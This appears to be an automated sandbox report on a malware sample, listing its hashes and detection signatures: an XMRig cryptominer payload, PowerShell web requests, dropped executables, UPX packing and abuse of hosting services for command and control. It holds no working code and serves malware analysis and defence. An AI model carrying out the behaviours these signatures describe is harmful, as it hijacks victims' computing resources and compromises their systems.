General

  • Target

    27ba0bd4ae29c0f2eec63ee434860f90_NeikiAnalytics.exe

  • Size

    1.6MB

  • Sample

    240525-n1nr9age56

  • MD5

    27ba0bd4ae29c0f2eec63ee434860f90

  • SHA1

    9a3323febf34039966ecea42c915719d3f82a6b3

  • SHA256

    8f2f894715de4a4a66bf9eee85e9d8d86f21aaf8f3bc82e3b3b05bcf5d439cee

  • SHA512

    cde602e8da3405ef11c3873a75b1a5b05fc4462b201e691c54b29895ab3e2dc4b111bae9a668a4a9a11cf3ca538d3a18ab8e8d92f39095a0951ddbdd64cab7a5

  • SSDEEP

    24576:zv3/fTLF671TilQFG4P5PMkFfkeMlN675EgEPgsZLHYm2WVDuu:Lz071uv4BPMkFfdg6NsNtJVN

Malware Config

Targets

    • Target

      27ba0bd4ae29c0f2eec63ee434860f90_NeikiAnalytics.exe

    • Size

      1.6MB

    • MD5

      27ba0bd4ae29c0f2eec63ee434860f90

    • SHA1

      9a3323febf34039966ecea42c915719d3f82a6b3

    • SHA256

      8f2f894715de4a4a66bf9eee85e9d8d86f21aaf8f3bc82e3b3b05bcf5d439cee

    • SHA512

      cde602e8da3405ef11c3873a75b1a5b05fc4462b201e691c54b29895ab3e2dc4b111bae9a668a4a9a11cf3ca538d3a18ab8e8d92f39095a0951ddbdd64cab7a5

    • SSDEEP

      24576:zv3/fTLF671TilQFG4P5PMkFfkeMlN675EgEPgsZLHYm2WVDuu:Lz071uv4BPMkFfdg6NsNtJVN

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • XMRig Miner payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Powershell Invoke Web Request.

    • Executes dropped EXE

    • Loads dropped DLL

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Legitimate hosting services abused for malware hosting/C2

MITRE ATT&CK Enterprise v15

Tasks